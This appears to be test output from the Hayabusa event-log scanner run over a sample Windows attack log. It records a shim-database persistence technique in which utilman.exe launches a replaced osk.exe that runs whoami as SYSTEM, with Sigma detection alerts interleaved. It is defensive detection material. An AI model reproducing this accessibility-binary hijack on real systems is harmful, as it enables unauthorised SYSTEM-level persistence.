+2019-03-20 05:42:38.774 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: msg  *  ""hello from run key""  :  Path: C:\Windows\System32\msg.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /c msg *  ""hello from run key""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:43:24.560 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Windows Media Player\wmpnetwk.exe""  :  Path: C:\Program Files\Windows Media Player\wmpnetwk.exe  :  User: NT AUTHORITY\NETWORK SERVICE  :  Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:46:04.916 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:46:20.518 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe""   :  Path: C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:48:33.439 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB  ""    :  Path: C:\Windows\System32\sdbinst.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:48:33.439 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:48:33.559 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe""   :  Path: C:\Windows\System32\osk.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:48:33.860 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug  :  Path: C:\Windows\System32\Utilman.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:48:33.870 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB  ""    :  Path: C:\Windows\System32\sdbinst.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:48:33.870 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:48:33.920 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe""   :  Path: C:\Windows\System32\osk.exe  :  User: EXAMPLE\user01  :  Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:48:36.644 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug  :  Path: C:\Windows\System32\Utilman.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:27.787 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB  ""    :  Path: C:\Windows\System32\sdbinst.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:27.787 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:27.967 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe""   :  Path: C:\Windows\System32\osk.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:27.988 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug  :  Path: C:\Windows\System32\Utilman.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe""   :  Path: C:\Windows\System32\osk.exe  :  User: EXAMPLE\user01  :  Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB  ""    :  Path: C:\Windows\System32\sdbinst.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:31.212 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug  :  Path: C:\Windows\System32\Utilman.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:44.792 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB  ""    :  Path: C:\Windows\System32\sdbinst.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:44.792 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:44.972 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe""   :  Path: C:\Windows\System32\osk.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:44.982 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug  :  Path: C:\Windows\System32\Utilman.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:45.152 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe""   :  Path: C:\Windows\System32\osk.exe  :  User: EXAMPLE\user01  :  Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:45.162 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB  ""    :  Path: C:\Windows\System32\sdbinst.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:45.162 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:47.245 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug  :  Path: C:\Windows\System32\Utilman.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:51:05.017 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:25.933 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB  ""    :  Path: C:\Windows\System32\sdbinst.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:25.933 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:26.104 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe""   :  Path: C:\Windows\System32\osk.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:26.114 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug  :  Path: C:\Windows\System32\Utilman.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:26.274 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe""   :  Path: C:\Windows\System32\osk.exe  :  User: EXAMPLE\user01  :  Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:26.364 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB  ""    :  Path: C:\Windows\System32\sdbinst.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:26.364 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:29.138 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug  :  Path: C:\Windows\System32\Utilman.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:47.124 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB  ""    :  Path: C:\Windows\System32\sdbinst.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:47.124 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:47.294 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe""   :  Path: C:\Windows\System32\osk.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:47.334 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug  :  Path: C:\Windows\System32\Utilman.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe""   :  Path: C:\Windows\System32\osk.exe  :  User: EXAMPLE\user01  :  Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB  ""    :  Path: C:\Windows\System32\sdbinst.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:50.268 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug  :  Path: C:\Windows\System32\Utilman.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:56:05.149 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:20.994 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Users\user01\Desktop\titi.sdb""    :  Path: C:\Windows\System32\sdbinst.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:20.994 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:28.214 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c   :  Path: C:\Windows\System32\smss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:28.294 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16  :  Path: C:\Windows\System32\csrss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:28.304 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe  :  Path: C:\Windows\System32\winlogon.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:28.815 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0  :  Path: C:\Windows\System32\LogonUI.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:31.860 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug  :  Path: C:\Windows\System32\Utilman.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:35.745 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""c:\osk.exe""   :  Path: C:\osk.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: whoami  :  Path: C:\Windows\System32\whoami.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ""c:\osk.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:00:01.518 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\wsqmcons.exe   :  Path: C:\Windows\System32\wsqmcons.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:00:01.539 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader""  :  Path: C:\Windows\System32\schtasks.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\System32\wsqmcons.exe ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:10:34.489 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0)  :  Path: C:\Windows\System32\taskhost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:18:54.257 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe  :  Path: C:\Windows\System32\AtBroker.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:18:57.202 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc""   :  Path: C:\Windows\System32\mmc.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:21:05.306 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:22:28.886 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\rundll32.exe"" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb  :  Path: C:\Windows\System32\rundll32.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:22:33.593 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Windows NT\Accessories\WORDPAD.EXE"" ""C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb""  :  Path: C:\Program Files\Windows NT\Accessories\wordpad.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Windows\system32\rundll32.exe"" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
